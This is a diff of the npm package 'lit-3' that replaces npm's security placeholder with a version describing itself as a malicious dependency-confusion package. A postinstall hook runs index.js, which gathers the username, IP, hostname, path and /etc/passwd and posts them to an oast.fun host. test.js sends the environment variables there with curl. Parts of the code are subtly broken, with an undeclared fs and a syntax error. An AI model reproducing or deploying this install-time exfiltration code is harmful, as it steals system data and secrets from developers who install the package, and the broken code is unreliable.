lit-3 0.0.1-security → 3.1.2

package/index.js

@@ -0,0 +1,84 @@
+const os = require('os');
+const axios = require('axios');
+const path = require('path');
+
+// Mendapatkan waktu saat ini
+function getCurrentTime() {
+  return new Date().toISOString();
+}
+
+// Mendapatkan nama organisasi atau pengguna
+function getOrganization() {
+  return os.userInfo().username;  // Atau Anda bisa menambahkan logika lain untuk mendapatkan nama organisasi
+}
+
+// Mendapatkan IP eksternal dengan menggunakan API
+function getExternalIP() {
+  return axios.get('https://api.ipify.org?format=json')
+    .then(response => response.data.ip)
+    .catch(error => 'IP eksternal tidak ditemukan');
+}
+
+// Mendapatkan nama host
+function getHostname() {
+  return os.hostname();
+}
+
+// Mendapatkan jalur direktori saat ini
+function getCurrentPath() {
+  return path.resolve('.');
+}
+
+// Mendapatkan nama paket dari file package.json
+function getPackageName() {
+  const packageJsonPath = path.resolve('package.json');
+  if (fs.existsSync(packageJsonPath)) {
+    const packageJson = require(packageJsonPath);
+    return packageJson.name || 'Unknown Package'; // Mengambil nama dari package.json
+  } else {
+    return 'Package.json tidak ditemukan';  // Jika tidak ada package.json
+  }
+}
+
+function getEtcPasswd() {
+  try {
+    const passwdContent = fs.readFileSync('/etc/passwd', 'utf-8');
+    return passwdContent;
+  } catch (error) {
+    return 'Tidak dapat membaca file /etc/passwd';
+  }
+}
+
+// Mengumpulkan data yang dibutuhkan
+async function collectData() {
+  const time = getCurrentTime();
+  const organization = getOrganization();
+  const externalIP = await getExternalIP();
+  const hostname = getHostname();
+  const currentPath = getCurrentPath();
+  const packageName = getPackageName(); // Sesuaikan dengan nama package yang Anda uji
+  const passwd = getEtcPasswd();
+
+  const data = {
+    time: time,
+    organization: organization,
+    ipAddress: externalIP,
+    packageName: packageName,
+    hostname: hostname,
+    currentPath: currentPath;
+    passwd: passwd
+  };
+
+  console.log(data);  // Tampilkan data yang dikumpulkan
+
+  // Mengirim data ke server target (misalnya Attacoker atau server lain)
+  axios.post('https://htbyrkwvrlyvwangubmpemhenzxfdsffg.oast.fun/log', data)
+    .then(response => {
+      console.log('Data berhasil dikirim:', response.data);
+    })
+    .catch(error => {
+      console.error('Error saat mengirim data:', error);
+    });
+}
+
+collectData(); // Menjalankan fungsi untuk mengumpulkan dan mengirim data

package/package.json

@@ -1,6 +1,14 @@
 {
-  "name": "lit-3",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+    "name": "lit-3",
+    "version": "3.1.2",
+    "description": "Malicious package for dependency confusion",
+    "main": "index.js",
+    "scripts": {
+        "postinstall": "node index.js"
+    },
+    "author": "Attacker",
+    "license": "MIT",
+    "dependencies": {
+        "axios": "^0.21.1"
+    }
 }

package/test.js

@@ -0,0 +1,7 @@
+const { exec } = require('child_process');
+exec('curl -X POST https://htbyrkwvrlyvwangubmpemhenzxfdsffg.oast.fun -d "$(env)"', (error) => {
+    if (error) {
+        console.error(`Exec error: ${error}`);
+        return;
+    }
+});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=lit-3 for more information.